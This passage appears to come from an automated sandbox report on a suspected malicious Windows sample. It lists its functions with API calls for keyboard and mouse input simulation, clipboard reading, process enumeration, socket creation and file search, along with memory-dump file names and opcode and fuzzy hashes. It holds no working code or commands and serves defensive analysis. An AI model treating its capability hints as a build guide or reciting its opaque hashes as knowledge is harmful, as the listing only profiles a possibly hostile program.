                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8), ref: 004239C6
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109), ref: 004239CD
                                                                                                                                                                  • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8), ref: 00423A28
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109), ref: 00423A55
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1354853467-0
                                                                                                                                                                  • Opcode ID: 75e0507c16032397253a36c483c650aa8ee90e2318997e4a1608cfc9692cb5c1
                                                                                                                                                                  • Instruction ID: cd3137c8dbd02be27013a877d5fd1fddf93775f751d42d1efa9e46af4947de33
                                                                                                                                                                  • Opcode Fuzzy Hash: 75e0507c16032397253a36c483c650aa8ee90e2318997e4a1608cfc9692cb5c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C414DB2A001256FCF102FB8DC05AAE7A71EB01325F54462BF930962E1D77D4EC18B58
                                                                                                                                                                  Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3031425849-0
                                                                                                                                                                  • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                  • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                                                  Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4170576061-0
                                                                                                                                                                  • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                  • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                  • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                  • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                  Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                  • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                  • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                                  • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                  • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                                  • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                  • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                  Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 948891078-24824748
                                                                                                                                                                  • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                  • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                                  • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                                  Function 0044663B Relevance: 7.1, Strings: 5, Instructions: 895COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                  • API String ID: 0-2872873767
                                                                                                                                                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                                  Function 0042435D Relevance: 7.0, Strings: 5, Instructions: 761COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$T
                                                                                                                                                                  • API String ID: 2429186680-740461495
                                                                                                                                                                  • Opcode ID: b72cfe7de07cb9d0978f61b6edeb2304fb673773e5d036d49eb9d98452444512
                                                                                                                                                                  • Instruction ID: 4e7ec58ed90b4ed80869aa83cdae9d8c721e1562ec3e7372f020a8cacf339105
                                                                                                                                                                  • Opcode Fuzzy Hash: b72cfe7de07cb9d0978f61b6edeb2304fb673773e5d036d49eb9d98452444512
                                                                                                                                                                  • Instruction Fuzzy Hash: DD528176E0026A8BDF14CFA8D4403EEB7B1FF94310F95816BD815AB381D7789946CB98
                                                                                                                                                                  Function 004755C4 Relevance: 6.1, APIs: 4, Instructions: 148processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                                  Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 15083398-0
                                                                                                                                                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                                                  Function 0044EB5F Relevance: 5.6, Strings: 4, Instructions: 643COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: @oH$\$^$h
                                                                                                                                                                  • API String ID: 0-3701065813
                                                                                                                                                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                                                  Function 0043333C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                                  • String ID: DOWN
                                                                                                                                                                  • API String ID: 2434400541-711622031
                                                                                                                                                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                                                  Function 0041E364 Relevance: 4.8, APIs: 3, Instructions: 269timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(00496E80,00000000,00000000,00000000,00000000,00000000,0048D360,0000002C,0041EA73,0048D380,00000008,004156E4,?,?,?), ref: 0041E48D
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00496E84,?,?,0000003F,00000000,?), ref: 0041E50B
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00496ED8,000000FF,?,0000003F,00000000,?), ref: 0041E53F
                                                                                                                                                                    • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                                                                    • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1184061189-0
                                                                                                                                                                  • Opcode ID: 06363b2cab1afc51bffd968e0dea48356ae4f4d141c4ef8976a29c5ecb2b1261
                                                                                                                                                                  • Instruction ID: 6e93d5efaa4a90a82b68055889133adc72b509ee617d9465a01728c8ae8b60d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 06363b2cab1afc51bffd968e0dea48356ae4f4d141c4ef8976a29c5ecb2b1261
                                                                                                                                                                  • Instruction Fuzzy Hash: D391C3B5900255AFDB109FA6E8819DEBBB5BF19354B54003FE940A7251D7389D82CB2C
                                                                                                                                                                  Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                  Memory Dump Source
